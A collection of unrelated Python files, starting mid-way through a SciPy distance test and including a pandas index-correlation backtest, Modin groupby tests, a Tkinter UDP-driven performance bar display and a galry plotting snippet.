dist2 = sokalmichener(x, y)
# These should be exactly the same.
assert_equal(dist1, dist2)
def test__validate_vector():
x = [1, 2, 3]
y = _validate_vector(x)
assert_array_equal(y, x)
y = _validate_vector(x, dtype=np.float64)
assert_array_equal(y, x)
assert_equal(y.dtype, np.float64)
x = [1]
y = _validate_vector(x)
assert_equal(y.ndim, 1)
assert_equal(y, x)
x = 1
y = _validate_vector(x)
assert_equal(y.ndim, 1)
assert_equal(y, [x])
x = np.arange(5).reshape(1, -1, 1)
y = _validate_vector(x)
assert_equal(y.ndim, 1)
assert_array_equal(y, x[0, :, 0])
x = [[1, 2], [3, 4]]
assert_raises(ValueError, _validate_vector, x)
if __name__ == "__main__":
run_module_suite()
|
import pandas as pd
import numpy as np
import math
from functools import reduce
from scipy.stats.stats import pearsonr
from matplotlib import pyplot as plt
data_path=r'./SWI closing price.xlsx'
#columns_list=['801040.SWI','801180.SWI','801710.SWI']
data=pd.read_excel(data_path)
columns_list=list(data.head(0))[1:]
data_question1=data[columns_list]
for industry in list(data_question1.head(0)):
data_question1[industry+'_Lag1'] = data_question1[industry].shift(periods=-1,axis=0)
data_question1[industry+'_rate'] = data_question1[industry]/data_question1[industry+'_Lag1']
data_question1[industry+'_lograte'] = np.log(data_question1[industry+'_rate'])
data_question1.dropna(inplace=True)
data_question1_rate=data_question1[[x+'_rate' for x in columns_list]]
out=[]
columns_list_rate=[x+'_lograte' for x in list(data.head(0))[1:]]
for pair_one in columns_list_rate:
for pair_two in columns_list_rate:
pair_one_l = list(data_question1[pair_one])
pair_two_l = list(data_question1[pair_two])
start_one = 0
for i in range(10):
start_two =0
for j in range(10):
if start_one < start_two:
sli_one = pair_one_l[start_one: start_one+300]
sli_two=pair_two_l[start_two: start_two+300]
corr = pearsonr(sli_one,sli_two)[0]
if corr >0.1 and corr <1.0:
out.append([pair_one,pair_two,start_one,start_two,corr])
start_two+=30
start_one+=30
autocorr = [item for item in out if item[0]==item[1]]
cross = [item for item in out if item[0]!=item[1]]
data_score = pd.DataFrame()
data_score[columns_list] = data_question1[[x+'_lograte' for x in columns_list]]
for field in columns_list:
data_score[field+'_score'] = 0
data_score.dropna(inplace=True)
for i in range(len(cross)):
field1 = cross[i][0][:-8]
field2 = cross[i][1][:-8]
lag1 = cross[i][2]
lag2 = cross[i][3]
coef = cross[i][4]
for t in range(1,301):
if data_score.loc[t+lag1,field1] > 0:
data_score.loc[t+lag2,field2+'_score'] += coef
elif data_score.loc[t+lag1,field1] < 0:
data_score.loc[t+lag2,field2+'_score'] -= coef
score_list=[x+'_score' for x in columns_list]
data_score_n=data_score[score_list]
def Score_rank(t,score_list,data_score_n,data_score):
total=1
for i in range(len(score_list)):
total+=math.exp(np.array(data_score_n[score_list])[t][i])
weight = [math.exp(np.array(data_score_n[score_list])[t][i])/total for i in range(len(score_list))]
weight = weight+[1/total]
value_rate = np.dot(np.array(data_question1_rate)[t],np.array(weight)[:-1])+np.array(weight)[-1]
return weight,value_rate
value_total=[1]
weight_total=[[0]*27+[1]]
for t in range(len(np.array(data_score))):
weight_total.append(Score_rank(t,score_list,data_score_n,data_score)[0])
value_total.append(Score_rank(t,score_list,data_score_n,data_score)[1])
value_day=[1]
for i in range(1,len(value_total)):
value_day.append(reduce(lambda x,y:x*y, value_total[:i]))
plt.plot(value_day[:500])
Annual_rate=(value_day[500])**(250/500)-1
def max_withdrawal(data):
mw=((pd.DataFrame(data).cummax()-pd.DataFrame(data))/pd.DataFrame(data).cummax()).max()
return round(mw,4)
Maximum_withdrawal=max_withdrawal(value_day[:500])
from scipy import stats
data_index=pd.read_excel(r'./baseline.xlsx')
data_index=list(data_index['close'])[:500]
Beta,Alpha,R_value,P_value,Std_err=stats.linregress(data_index,value_day[:500])
print(Annual_rate,Maximum_withdrawal,Beta,Alpha,R_value,P_value,Std_err)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import sys
import pandas
import numpy as np
import modin.pandas as pd
from modin.pandas.utils import from_pandas, to_pandas
PY2 = False
if sys.version_info.major < 3:
PY2 = True
@pytest.fixture
def ray_df_equals_pandas(ray_df, pandas_df):
assert isinstance(ray_df, pd.DataFrame)
assert to_pandas(ray_df).equals(pandas_df) or (
all(ray_df.isna().all()) and all(pandas_df.isna().all())
)
@pytest.fixture
def ray_df_almost_equals_pandas(ray_df, pandas_df):
assert isinstance(ray_df, pd.DataFrame)
difference = to_pandas(ray_df) - pandas_df
diff_max = difference.max().max()
assert (
to_pandas(ray_df).equals(pandas_df)
or diff_max < 0.0001
or (all(ray_df.isna().all()) and all(pandas_df.isna().all()))
)
@pytest.fixture
def ray_series_equals_pandas(ray_df, pandas_df):
assert ray_df.equals(pandas_df)
@pytest.fixture
def ray_df_equals(ray_df1, ray_df2):
assert to_pandas(ray_df1).equals(to_pandas(ray_df2))
@pytest.fixture
def ray_groupby_equals_pandas(ray_groupby, pandas_groupby):
for g1, g2 in zip(ray_groupby, pandas_groupby):
assert g1[0] == g2[0]
ray_df_equals_pandas(g1[1], g2[1])
def test_simple_row_groupby():
pandas_df = pandas.DataFrame(
{
"col1": [0, 1, 2, 3],
"col2": [4, 5, 6, 7],
"col3": [3, 8, 12, 10],
"col4": [17, 13, 16, 15],
"col5": [-4, -5, -6, -7],
}
)
ray_df = from_pandas(pandas_df)
by = [1, 2, 1, 2]
n = 1
ray_groupby = ray_df.groupby(by=by)
pandas_groupby = pandas_df.groupby(by=by)
ray_groupby_equals_pandas(ray_groupby, pandas_groupby)
test_ngroups(ray_groupby, pandas_groupby)
test_skew(ray_groupby, pandas_groupby)
test_ffill(ray_groupby, pandas_groupby)
test_sem(ray_groupby, pandas_groupby)
test_mean(ray_groupby, pandas_groupby)
test_any(ray_groupby, pandas_groupby)
test_min(ray_groupby, pandas_groupby)
test_idxmax(ray_groupby, pandas_groupby)
test_ndim(ray_groupby, pandas_groupby)
test_cumsum(ray_groupby, pandas_groupby)
test_pct_change(ray_groupby, pandas_groupby)
test_cummax(ray_groupby, pandas_groupby)
apply_functions = [lambda df: df.sum(), lambda df: -df]
for func in apply_functions:
test_apply(ray_groupby, pandas_groupby, func)
test_dtypes(ray_groupby, pandas_groupby)
test_first(ray_groupby, pandas_groupby)
test_backfill(ray_groupby, pandas_groupby)
test_cummin(ray_groupby, pandas_groupby)
test_bfill(ray_groupby, pandas_groupby)
test_idxmin(ray_groupby, pandas_groupby)
test_prod(ray_groupby, pandas_groupby)
test_std(ray_groupby, pandas_groupby)
agg_functions = ["min", "max"]
for func in agg_functions:
test_agg(ray_groupby, pandas_groupby, func)
test_aggregate(ray_groupby, pandas_groupby, func)
test_last(ray_groupby, pandas_groupby)
test_mad(ray_groupby, pandas_groupby)
test_rank(ray_groupby, pandas_groupby)
test_max(ray_groupby, pandas_groupby)
test_var(ray_groupby, pandas_groupby)
test_len(ray_groupby, pandas_groupby)
test_sum(ray_groupby, pandas_groupby)
test_ngroup(ray_groupby, pandas_groupby)
test_nunique(ray_groupby, pandas_groupby)
test_median(ray_groupby, pandas_groupby)
test_head(ray_groupby, pandas_groupby, n)
test_cumprod(ray_groupby, pandas_groupby)
test_cov(ray_groupby, pandas_groupby)
transform_functions = [lambda df: df + 4, lambda df: -df - 10]
for func in transform_functions:
test_transform(ray_groupby, pandas_groupby, func)
pipe_functions = [lambda dfgb: dfgb.sum()]
for func in pipe_functions:
test_pipe(ray_groupby, pandas_groupby, func)
test_corr(ray_groupby, pandas_groupby)
test_fillna(ray_groupby, pandas_groupby)
test_count(ray_groupby, pandas_groupby)
test_tail(ray_groupby, pandas_groupby, n)
test_quantile(ray_groupby, pandas_groupby)
test_take(ray_groupby, pandas_groupby)
def test_single_group_row_groupby():
pandas_df = pandas.DataFrame(
{
"col1": [0, 1, 2, 3],
"col2": [4, 5, 36, 7],
"col3": [3, 8, 12, 10],
"col4": [17, 3, 16, 15],
"col5": [-4, 5, -6, -7],
}
)
ray_df = from_pandas(pandas_df)
by = ["1", "1", "1", "1"]
n = 6
ray_groupby = ray_df.groupby(by=by)
pandas_groupby = pandas_df.groupby(by=by)
ray_groupby_equals_pandas(ray_groupby, pandas_groupby)
test_ngroups(ray_groupby, pandas_groupby)
test_skew(ray_groupby, pandas_groupby)
test_ffill(ray_groupby, pandas_groupby)
test_sem(ray_groupby, pandas_groupby)
test_mean(ray_groupby, pandas_groupby)
test_any(ray_groupby, pandas_groupby)
test_min(ray_groupby, pandas_groupby)
test_idxmax(ray_groupby, pandas_groupby)
test_ndim(ray_groupby, pandas_groupby)
test_cumsum(ray_groupby, pandas_groupby)
test_pct_change(ray_groupby, pandas_groupby)
test_cummax(ray_groupby, pandas_groupby)
apply_functions = [lambda df: df.sum(), lambda df: -df]
for func in apply_functions:
test_apply(ray_groupby, pandas_groupby, func)
test_dtypes(ray_groupby, pandas_groupby)
test_first(ray_groupby, pandas_groupby)
test_backfill(ray_groupby, pandas_groupby)
test_cummin(ray_groupby, pandas_groupby)
test_bfill(ray_groupby, pandas_groupby)
test_idxmin(ray_groupby, pandas_groupby)
test_prod(ray_groupby, pandas_groupby)
test_std(ray_groupby, pandas_groupby)
agg_functions = ["min", "max"]
for func in agg_functions:
test_agg(ray_groupby, pandas_groupby, func)
test_aggregate(ray_groupby, pandas_groupby, func)
test_last(ray_groupby, pandas_groupby)
test_mad(ray_groupby, pandas_groupby)
test_rank(ray_groupby, pandas_groupby)
test_max(ray_groupby, pandas_groupby)
test_var(ray_groupby, pandas_groupby)
test_len(ray_groupby, pandas_groupby)
test_sum(ray_groupby, pandas_groupby)
test_ngroup(ray_groupby, pandas_groupby)
test_nunique(ray_groupby, pandas_groupby)
test_median(ray_groupby, pandas_groupby)
test_head(ray_groupby, pandas_groupby, n)
test_cumprod(ray_groupby, pandas_groupby)
test_cov(ray_groupby, pandas_groupby)
transform_functions = [lambda df: df + 4, lambda df: -df - 10]
for func in transform_functions:
test_transform(ray_groupby, pandas_groupby, func)
pipe_functions = [lambda dfgb: dfgb.sum()]
for func in pipe_functions:
test_pipe(ray_groupby, pandas_groupby, func)
test_corr(ray_groupby, pandas_groupby)
test_fillna(ray_groupby, pandas_groupby)
test_count(ray_groupby, pandas_groupby)
test_tail(ray_groupby, pandas_groupby, n)
test_quantile(ray_groupby, pandas_groupby)
test_take(ray_groupby, pandas_groupby)
@pytest.mark.skip(reason="See Modin issue #21.")
def test_large_row_groupby():
pandas_df = pandas.DataFrame(
np.random.randint(0, 8, size=(100, 4)), columns=list("ABCD")
)
ray_df = from_pandas(pandas_df)
by = [str(i) for i in pandas_df["A"].tolist()]
n = 4
ray_groupby = ray_df.groupby(by=by)
pandas_groupby = pandas_df.groupby(by=by)
ray_groupby_equals_pandas(ray_groupby, pandas_groupby)
test_ngroups(ray_groupby, pandas_groupby)
test_skew(ray_groupby, pandas_groupby)
test_ffill(ray_groupby, pandas_groupby)
test_sem(ray_groupby, pandas_groupby)
test_mean(ray_groupby, pandas_groupby)
test_any(ray_groupby, pandas_groupby)
test_min(ray_groupby, pandas_groupby)
test_idxmax(ray_groupby, pandas_groupby)
test_ndim(ray_groupby, pandas_groupby)
test_cumsum(ray_groupby, pandas_groupby)
test_pct_change(ray_groupby, pandas_groupby)
test_cummax(ray_groupby, pandas_groupby)
apply_functions = [lambda df: df.sum(), lambda df: -df]
for func in apply_functions:
test_apply(ray_groupby, pandas_groupby, func)
test_dtypes(ray_groupby, pandas_groupby)
test_first(ray_groupby, pandas_groupby)
test_backfill(ray_groupby, pandas_groupby)
test_cummin(ray_groupby, pandas_groupby)
test_bfill(ray_groupby, pandas_groupby)
test_idxmin(ray_groupby, pandas_groupby)
# test_prod(ray_groupby, pandas_groupby) causes overflows
test_std(ray_groupby, pandas_groupby)
agg_functions = ["min", "max"]
for func in agg_functions:
test_agg(ray_groupby, pandas_groupby, func)
test_aggregate(ray_groupby, pandas_groupby, func)
test_last(ray_groupby, pandas_groupby)
test_mad(ray_groupby, pandas_groupby)
test_rank(ray_groupby, pandas_groupby)
test_max(ray_groupby, pandas_groupby)
test_var(ray_groupby, pandas_groupby)
test_len(ray_groupby, pandas_groupby)
test_sum(ray_groupby, pandas_groupby)
test_ngroup(ray_groupby, pandas_groupby)
test_nunique(ray_groupby, pandas_groupby)
test_median(ray_groupby, pandas_groupby)
test_head(ray_groupby, pandas_groupby, n)
# test_cumprod(ray_groupby, pandas_groupby) causes overflows
test_cov(ray_groupby, pandas_groupby)
transform_functions = [lambda df: df + 4, lambda df: -df - 10]
for func in transform_functions:
test_transform(ray_groupby, pandas_groupby, func)
pipe_functions = [lambda dfgb: dfgb.sum()]
for func in pipe_functions:
test_pipe(ray_groupby, pandas_groupby, func)
test_corr(ray_groupby, pandas_groupby)
test_fillna(ray_groupby, pandas_groupby)
test_count(ray_groupby, pandas_groupby)
test_tail(ray_groupby, pandas_groupby, n)
test_quantile(ray_groupby, pandas_groupby)
test_take(ray_groupby, pandas_groupby)
def test_simple_col_groupby():
pandas_df = pandas.DataFrame(
{
"col1": [0, 3, 2, 3],
"col2": [4, 1, 6, 7],
"col3": [3, 8, 2, 10],
"col4": [1, 13, 6, 15],
"col5": [-4, 5, 6, -7],
}
)
ray_df = from_pandas(pandas_df)
by = [1, 2, 3, 2, 1]
ray_groupby = ray_df.groupby(axis=1, by=by)
pandas_groupby = pandas_df.groupby(axis=1, by=by)
ray_groupby_equals_pandas(ray_groupby, pandas_groupby)
test_ngroups(ray_groupby, pandas_groupby)
test_skew(ray_groupby, pandas_groupby)
test_ffill(ray_groupby, pandas_groupby)
test_sem(ray_groupby, pandas_groupby)
test_mean(ray_groupby, pandas_groupby)
test_any(ray_groupby, pandas_groupby)
test_min(ray_groupby, pandas_groupby)
test_ndim(ray_groupby, pandas_groupby)
if not PY2:
# idxmax and idxmin fail on column groupby in pandas with python2
test_idxmax(ray_groupby, pandas_groupby)
test_idxmin(ray_groupby, pandas_groupby)
test_quantile(ray_groupby, pandas_groupby)
# https://github.com/pandas-dev/pandas/issues/21127
# test_cumsum(ray_groupby, pandas_groupby)
# test_cummax(ray_groupby, pandas_groupby)
# test_cummin(ray_groupby, pandas_groupby)
# test_cumprod(ray_groupby, pandas_groupby)
test_pct_change(ray_groupby, pandas_groupby)
apply_functions = [lambda df: -df, lambda df: df.sum(axis=1)]
for func in apply_functions:
test_apply(ray_groupby, pandas_groupby, func)
test_first(ray_groupby, pandas_groupby)
test_backfill(ray_groupby, pandas_groupby)
test_bfill(ray_groupby, pandas_groupby)
test_prod(ray_groupby, pandas_groupby)
test_std(ray_groupby, pandas_groupby)
test_last(ray_groupby, pandas_groupby)
test_mad(ray_groupby, pandas_groupby)
test_max(ray_groupby, pandas_groupby)
test_var(ray_groupby, pandas_groupby)
test_len(ray_groupby, pandas_groupby)
test_sum(ray_groupby, pandas_groupby)
# Pandas fails on this case with ValueError
# test_ngroup(ray_groupby, pandas_groupby)
# test_nunique(ray_groupby, pandas_groupby)
test_median(ray_groupby, pandas_groupby)
test_cov(ray_groupby, pandas_groupby)
transform_functions = [lambda df: df + 4, lambda df: -df - 10]
for func in transform_functions:
test_transform(ray_groupby, pandas_groupby, func)
pipe_functions = [lambda dfgb: dfgb.sum()]
for func in pipe_functions:
test_pipe(ray_groupby, pandas_groupby, func)
test_corr(ray_groupby, pandas_groupby)
test_fillna(ray_groupby, pandas_groupby)
test_count(ray_groupby, pandas_groupby)
test_take(ray_groupby, pandas_groupby)
@pytest.fixture
def test_ngroups(ray_groupby, pandas_groupby):
assert ray_groupby.ngroups == pandas_groupby.ngroups
@pytest.fixture
def test_skew(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.skew(), pandas_groupby.skew())
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_ffill(ray_groupby, pandas_groupby):
return
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_sem(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_mean(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.mean(), pandas_groupby.mean())
@pytest.fixture
def test_any(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.any(), pandas_groupby.any())
@pytest.fixture
def test_min(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.min(), pandas_groupby.min())
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_idxmax(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_ndim(ray_groupby, pandas_groupby):
assert ray_groupby.ndim == pandas_groupby.ndim
@pytest.fixture
def test_cumsum(ray_groupby, pandas_groupby, axis=0):
ray_df_equals_pandas(
ray_groupby.cumsum(axis=axis), pandas_groupby.cumsum(axis=axis)
)
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_pct_change(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_cummax(ray_groupby, pandas_groupby, axis=0):
ray_df_equals_pandas(
ray_groupby.cummax(axis=axis), pandas_groupby.cummax(axis=axis)
)
@pytest.fixture
def test_apply(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.apply(func), pandas_groupby.apply(func))
@pytest.fixture
def test_dtypes(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.dtypes, pandas_groupby.dtypes)
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_first(ray_groupby, pandas_groupby):
return
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_backfill(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_cummin(ray_groupby, pandas_groupby, axis=0):
ray_df_equals_pandas(
ray_groupby.cummin(axis=axis), pandas_groupby.cummin(axis=axis)
)
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_bfill(ray_groupby, pandas_groupby):
return
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_idxmin(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_prod(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.prod(), pandas_groupby.prod())
@pytest.fixture
def test_std(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.std(), pandas_groupby.std())
@pytest.fixture
def test_aggregate(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.aggregate(func), pandas_groupby.aggregate(func))
@pytest.fixture
def test_agg(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.agg(func), pandas_groupby.agg(func))
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_last(ray_groupby, pandas_groupby):
return
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_mad(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_rank(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.rank(), pandas_groupby.rank())
@pytest.fixture
def test_max(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.max(), pandas_groupby.max())
@pytest.fixture
def test_var(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.var(), pandas_groupby.var())
@pytest.fixture
def test_len(ray_groupby, pandas_groupby):
assert len(ray_groupby) == len(pandas_groupby)
@pytest.fixture
def test_sum(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.sum(), pandas_groupby.sum())
@pytest.fixture
def test_ngroup(ray_groupby, pandas_groupby):
ray_series_equals_pandas(ray_groupby.ngroup(), pandas_groupby.ngroup())
@pytest.fixture
def test_nunique(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.nunique(), pandas_groupby.nunique())
@pytest.fixture
def test_median(ray_groupby, pandas_groupby):
ray_df_almost_equals_pandas(ray_groupby.median(), pandas_groupby.median())
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_head(ray_groupby, pandas_groupby, n):
return
@pytest.fixture
def test_cumprod(ray_groupby, pandas_groupby, axis=0):
ray_df_equals_pandas(ray_groupby.cumprod(), pandas_groupby.cumprod())
ray_df_equals_pandas(
ray_groupby.cumprod(axis=axis), pandas_groupby.cumprod(axis=axis)
)
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_cov(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_transform(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.transform(func), pandas_groupby.transform(func))
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_corr(ray_groupby, pandas_groupby):
return
@pytest.fixture
def test_fillna(ray_groupby, pandas_groupby):
ray_df_equals_pandas(
ray_groupby.fillna(method="ffill"), pandas_groupby.fillna(method="ffill")
)
@pytest.fixture
def test_count(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.count(), pandas_groupby.count())
@pytest.fixture
def test_pipe(ray_groupby, pandas_groupby, func):
ray_df_equals_pandas(ray_groupby.pipe(func), pandas_groupby.pipe(func))
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_tail(ray_groupby, pandas_groupby, n):
return
@pytest.fixture
def test_quantile(ray_groupby, pandas_groupby):
ray_df_equals_pandas(ray_groupby.quantile(q=0.4), pandas_groupby.quantile(q=0.4))
@pytest.mark.skip(reason="Defaulting to Pandas")
@pytest.fixture
def test_take(ray_groupby, pandas_groupby):
return
|
#!python
from time import *
port = 49999
class Graph:
def __init__ (self, x, y, width, color):
self.size = 0
self.xLoc = x
self.yLoc = y
self.width = width
self.color = color
self.done = 1
class Title:
def __init__ (self, y, t):
self.loc, self.text = y, t
class myScale:
def __init__ (self, pos, width, max):
self.pos = pos
self.width = width
self.maxRange = max
class GraphCollection:
# private data members
graphs = []
interPairSpacing = 0
intraPairSpacing = 0
number = 0
titles = []
scales = []
width = 0
# public function members
def __init__ (self, numPairs, titles, legends, maxRange, color1, color2, totalHeight,
totalWidth, spacing1, spacing2):
self.number = numPairs
self.interPairSpacing = spacing1
self.intraPairSpacing = spacing2
self.legend = legends
scaleHeight = .25
legendHeight = 1.5
# compute width of each graph
totalHeight = totalHeight - (scaleHeight + legendHeight + (self.interPairSpacing * (self.number - 1)))
perPairWidth = totalHeight / self.number
# create all graphs at proper locations
yStart = .5
for x in range(self.number):
self.graphs.append (Graph (0, yStart, perPairWidth, color1))
yStart = yStart + perPairWidth/2;
self.titles.append (Title (yStart, titles[x]))
yStart = yStart + perPairWidth/2;
yStart = yStart + self.interPairSpacing
self.scales.append (myScale (yStart-.1, totalWidth, maxRange))
# get nth graph of a group
def nth (self, group, which):
return (self.graphs[which-1])
from Tkinter import *
class Display (Frame):
def createGraphs (self, numPairs, titles, legends):
self.graphs = GraphCollection (numPairs, titles, legends, self.maxRange,
'red', 'blue',
self.height, self.width,
0.5, 0.25)
def incrementGraph (self, group, which, increment):
graph = self.graphs.nth (group, which)
graph.size = graph.size + increment
self.repaintSingle (group, which, increment)
def enable (self, which):
graph = self.graphs.nth (0, which)
graph.done = 0
def stopDrawing (self):
self.prevTime = 0
def startDrawing (self):
self.prevTime = time ()
def tick (self):
if self.prevTime == 0:
return
t = time ()
inc = t - self.prevTime
self.prevTime = t
for graph in self.graphs.graphs:
if not graph.done:
graph.size = graph.size + inc
self.repaintSingle2 (graph, inc)
def done (self, group, which):
graph = self.graphs.nth (group, which)
graph.done = 1
def repaintSingle2 (self, graph, amount):
x1 = str (1.25+self.scaleFactor*(graph.size-amount))+"i"
y1 = str (graph.yLoc )+"i"
x2 = str (1.25+self.scaleFactor * graph.size)+"i"
y2 = str (graph.yLoc + graph.width)+"i"
foo = self.draw.create_rectangle (x1, y1, x2, y2,
{"fill": graph.color,
"outline": ""})
self.deleteList.append (foo)
self.tk.update ()
def repaintSingle (self, group, which, amount):
graph = self.graphs.nth (group, which)
self.repaintSingle2 (graph, amount)
def repaintAll (self):
for graph in self.graphs.graphs:
x1 = "1.25i"
y1 = str (graph.yLoc )+"i"
x2 = str (1.25+self.scaleFactor*graph.size)+"i"
y2 = str (graph.yLoc + graph.width)+"i"
foo = self.draw.create_rectangle (x1, y1, x2, y2,
{"fill": graph.color,
"outline": ""})
self.deleteList.append (foo)
for title in self.graphs.titles:
self.draw.create_text (".1i", str (title.loc)+"i",
{'text': title.text,
'font': '*-times-medium-r-normal--*-240-*-*-*-*-*-*',
'anchor': 'w'})
for scale in self.graphs.scales:
y = scale.pos
x1 = 1.25
x2 = 1.25+self.scaleFactor * scale.maxRange
increment = scale.maxRange / scale.width
percent = 0
prevX = x1
while x1 <= x2:
self.draw.create_line (str (prevX)+"i", str (y)+"i", str (x1)+"i", str(y)+"i",
str (x1)+"i", str(y-.1)+"i")
self.draw.create_text (str (x1)+"i", str (y)+"i",
{'text': '%d' % percent,
'font': '*-times-medium-r-normal--*-180-*-*-*-*-*-*',
'anchor': 'n'})
prevX = x1
percent = percent + increment
x1 = x1 + self.scaleFactor * increment
legendY = self.height-.5;
self.draw.create_text (str ((self.width+1)/2)+"i", str (legendY)+"i",
{'text': 'Elapsed time (seconds)',
'font': '*-times-medium-r-normal--*-180-*-*-*-*-*-*',
'anchor': 'c'})
self.draw.create_text (str ((self.width+1)/2)+"i", ".25i",
{'text': self.graphs.legend[0],
'font': '*-times-medium-r-normal--*-240-*-*-*-*-*-*',
'anchor': 'c'})
self.tk.update ()
def createWidgets(self):
self.QUIT = Button(self.tk, {'text': 'QUIT', 'fg': 'red', 'command': self.quit})
self.QUIT.pack({'side': 'bottom', 'fill': 'both'})
self.draw = Canvas(self.tk, {"width" : str (self.width+1)+"i",
"height" : str (self.height)+"i"})
self.draw.pack({'side': 'left'})
self.tk.title ("Exo Perf-O-Meter")
def __init__ (self, maxRange, height, width, master=None):
self.height = height
self.width = width
self.maxRange = maxRange
self.scaleFactor = (self.width) / self.maxRange
self.deleteList = []
self.prevTime = 0
self.tk = Tk ()
self.createWidgets ()
from socket import *
from string import *
def getStartup ():
global sock
global barrierCount
barrierCount = 0
sock = socket (AF_INET, SOCK_DGRAM)
sock.bind (("", port))
initString = sock.recvfrom (512)
words = splitfields (initString[0], "_")
return ((words[0], words[1], splitfields (words[2], "."),
splitfields (words[3], "."), words[4], words[5], words[6]))
def doOp ():
global sock
global barrierCount
global barrierMach1
global barrierMach2
global barrierMach3
global numGraphsEnabled
command = sock.recvfrom (512)
addr = command[1]
command = splitfields (command[0], " ")
args = command[1:]
command = command[0]
if command == 'increment':
display.incrementGraph (atoi (args[0]),
atoi (args[1]),
atoi (args[2]))
return 0
elif command == 'enable':
numGraphsEnabled = numGraphsEnabled + 1
display.enable (atoi (args[0]))
return 0
elif command == 'barrier1d':
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'barrier2':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'barrier2d':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'barrier3':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
barrierMach2 = addr
elif barrierCount == 3:
sock.sendto ("1", barrierMach2)
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
barrierCount = 0
return 0
elif command == 'barrier3d':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
barrierMach2 = addr
elif barrierCount == 3:
sock.sendto ("1", barrierMach2)
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'barrier4':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
barrierMach2 = addr
elif barrierCount == 3:
barrierMach3 = addr
elif barrierCount == 4:
sock.sendto ("1", barrierMach3)
sock.sendto ("1", barrierMach2)
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
barrierCount = 0
return 0
elif command == 'barrier4d':
barrierCount = barrierCount + 1
if barrierCount == 1:
barrierMach1 = addr
elif barrierCount == 2:
barrierMach2 = addr
elif barrierCount == 3:
barrierMach3 = addr
elif barrierCount == 4:
sock.sendto ("1", barrierMach3)
sock.sendto ("1", barrierMach2)
sock.sendto ("1", barrierMach1)
sock.sendto ("1", addr)
display.startDrawing ()
barrierCount = 0
return 0
elif command == 'done':
display.done (atoi (args[0]),
atoi (args[1]))
numGraphsEnabled = numGraphsEnabled - 1
if numGraphsEnabled == 0:
display.stopDrawing ()
return 1
else:
print "Unknown command: ", command
return (0)
title, numberOfPairs, titles, legends, maxRange, width, height = getStartup ()
display = Display (atoi (maxRange), atof (width), atof (height)+0.25)
display.createGraphs (atoi (numberOfPairs), titles, legends)
display.repaintAll ()
from select import *
done = 0
ticks = 0
numGraphsEnabled = 0
totalGraphs = atoi (numberOfPairs) * 1
while done < totalGraphs:
ready = select ([sock], [], [], 0);
if ready[0] != []:
done = done + doOp ()
if time () > ticks + .1:
display.tick ()
ticks = time ()
display.mainloop ()
|
# import galry.plot as plt
from galry import *
from galry.plot import PlotWidget
import numpy as np
import numpy.random as rdn
info_level()
widget = PlotWidget()
n = 1000
k = 3
X = np.linspace(-1., 1., n).reshape((1, -1))
X = np.tile(X, (k, 1))
Y = .1 * np.sin(20. * X)
Y += np.arange(k).reshape((-1, 1)) * .1
widget.paint_manager.add_plot(X, Y, color=['r1','y','b'])
win = create_basic_window(widget)
show_window(win)
# plt.figure()
# plt.subplot(121) # LATER: subplot
# plt.text("Hello world",
# x=0, # centered
# y=1, # top
# size=18, # font size
# color='g', # color
